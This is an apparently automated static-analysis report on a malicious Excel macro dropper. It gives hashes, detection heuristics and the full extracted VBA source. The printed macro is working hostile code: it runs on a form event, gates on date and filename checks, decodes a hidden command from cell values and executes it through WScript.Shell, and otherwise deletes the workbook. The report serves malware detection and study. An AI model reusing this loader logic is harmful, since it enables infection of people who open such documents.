Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 41fd97847968ea52…

MALICIOUS

Office (OLE)

79.5 KB Created: 2020-03-23 07:35:22 Authoring application: Microsoft Excel First seen: 2021-02-18
MD5: 8f82e982fe759b181611f3d47a182f09 SHA-1: 158376a9910d159daccb23b52929035903cccafb SHA-256: 41fd97847968ea5227443b6f9137866d4fff02f4a9f935c3de8e995be63bcf96
220 Risk Score

Heuristics 5

  • ClamAV: Xls.Dropper.Agent-7640675-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7640675-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Debug.Print CreateObject("WScript.Shell").Exec(comm(495)).StdOut.read(0)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Debug.Print CreateObject("WScript.Shell").Exec(comm(495)).StdOut.read(0)
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2513 bytes
SHA-256: 3f95d48d4c8e9d0d99354cfa3513ee971be6e8816f1205d354692f6ec2456c99
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Multi, 1, 0, MSForms, MultiPage"
Attribute VB_Control = "falsse, 2, 1, MSForms, CommandButton"
Private Sub Multi_Layout(ByVal Index As Long)
muii = 0: eco
End Sub

Sub eco()
If InStr(Format(Cells(1, 1), "mmmm dd"), "rzo") > 0 And InStr(ThisWorkbook.Name, "r") Then mifrations Else emi
End Sub
Sub emi()
Application.DisplayAlerts = False:
remm
End Sub

Sub remm()
Dim xFullName As String
xFullName = Application.ActiveWorkbook.FullName
ActiveWorkbook.Saved = True
Application.ActiveWorkbook.ChangeFileAccess xlReadOnly
Kill xFullName
Application.ActiveWorkbook.Close False
End Sub

Function comm(j As Integer)
Dim m, a As String
a = ""
For p = 1 To 1
m = ""
For o = 20 To j
m = m + Cells(o, p)
Next o
a = a + formulas(m)
Next p
m = ""
For x = 20 To 43
m = m + formulas(Cells(x, 2))
Next x
comm = a & m
End Function

Sub mifrations()
Debug.Print CreateObject("WScript.Shell").Exec(comm(495)).StdOut.read(0)
End Sub

Function formulas(ByVal ou As String) As String

Dim waw As Integer

Dim Zm As Integer
Dim digi As Integer
Dim ami() As Integer
Dim lop() As Long
Dim iko As Integer

    iko = IIf(Right(ou, 1) Mod 2 = 0, 5, 4)
    ou = Left(ou, Len(ou) - IIf(Right(ou, 1) Mod 2 = 0, 1, 1))
    waw = Len(ou) / iko - 1
    ReDim ami(waw)
    ReDim lop(waw)

    Zm = 0
    digi = 0

    For digi = 0 To waw

        ami(digi) = digi - (waw + 1)
    Next digi


    For Zm = 0 To waw
        For digi = 0 To waw
            If CInt(Mid(ou, digi * iko + 1, iko - 3)) = Zm Then
                lop(Zm) = (Mid(ou, (digi + 1) * iko - 2, 3) + ami(Zm))
                Exit For
            End If
        Next digi
    Next Zm

    formulas = ""
    For Zm = 0 To waw
        formulas = formulas & Chr(lop(Zm))
    Next Zm

End Function



Private Sub falsse_Click()
mir = 209
eco
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.